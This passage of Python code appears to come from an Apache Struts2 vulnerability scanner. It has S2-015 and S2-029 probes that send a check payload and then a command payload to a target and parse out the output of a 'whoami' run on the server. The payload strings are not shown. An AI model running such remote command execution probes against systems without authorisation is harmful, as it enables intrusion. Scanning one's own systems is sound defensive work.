        print('Exec Result:\n%s\n' % req.content.split("u")[0])
def run(self):
    """S2-015 probe.

    The check payload's body must contain ``self.capta``; the command payload
    is then fetched and the text between ``Message</b>`` and ``.jsp`` is cut
    out, slashes removed and ``%0A`` turned into newlines. That text is never
    printed — it only acts as a gate: when the pattern does not match, the
    resulting IndexError is caught and the probe reports False.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing.

    Returns:
        True on a hit, False otherwise or on any exception (printed).
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url
    try:
        probe = request.get(self.url + self.check_payload, headers=self.headers)
        if self.capta not in probe.text:
            return False
        output = request.get(self.url + self.cmd_payload, headers=self.headers)
        extracted = re.findall('''Message</b>(.*?).jsp''', output.text)[0]
        # Computed for parity with the original, which never used it either.
        cmd_str = re.sub('%0A', '\n', re.sub('/', '', extracted))
        return True
    except Exception as e:
        print(e)
        return False
def run(self):
    """S2-029 probe.

    Each response is flattened (newlines and spaces removed) and every
    ``<input ... value="...">`` value collected. The check passes when
    ``self.capta`` equals one of those values exactly, after which the
    command payload's values are printed.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing.

    Returns:
        True on a hit, False otherwise or on any exception (printed).
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url

    def input_values(path):
        body = request.get(self.url + path, headers=self.headers).text
        flattened = body.replace('\n', '').replace(' ', '')
        return re.findall('<input.*?value="(.*?)".*?/>', flattened)

    try:
        if self.capta not in input_values(self.check_payload):
            print('不存在S2-029漏洞!')
            return False
        print('存在S2-029漏洞,执行whoami命令成功,结果为:', input_values(self.cmd_payload))
        return True
    except Exception as e:
        print(e)
        return False